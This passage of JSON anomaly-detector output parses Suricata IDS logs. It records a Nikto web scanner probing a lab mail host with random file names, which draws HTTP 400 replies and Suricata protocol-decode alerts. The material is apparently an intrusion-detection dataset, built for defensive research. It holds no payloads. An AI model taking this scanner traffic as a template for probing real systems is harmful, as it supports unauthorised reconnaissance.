",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46884, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":477548807594957,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 477548807594957, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.272253+0000\",\"flow_id\":477548807594957,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46884,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.show\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.show\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80", "/parser/model/time": 1583349514.274557, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46886, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.274557 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46886 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.htr", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.274771, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.htr\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.htr", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46886, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1119818217040458,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1119818217040458, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.274771+0000\",\"flow_id\":1119818217040458,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46886,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.htr\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.htr\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.27 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80", "/parser/model/time": 1583349514.276675, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46888, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.276675 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46888 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.chl+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.276861, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":287028353316318,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.chl+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.chl+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": 
null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46888, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":287028353316318,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 287028353316318, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.276861+0000\",\"flow_id\":287028353316318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46888,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.chl+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.chl+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80", "/parser/model/time": 1583349514.27886, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", 
"/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46890, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.278860 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46890 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.28 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.csp", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.279049+0000\",\"flow_id\":1745783930633893,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", 
"/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.279049, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1745783930633893,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46890,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.csp\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.csp\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.csp\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 
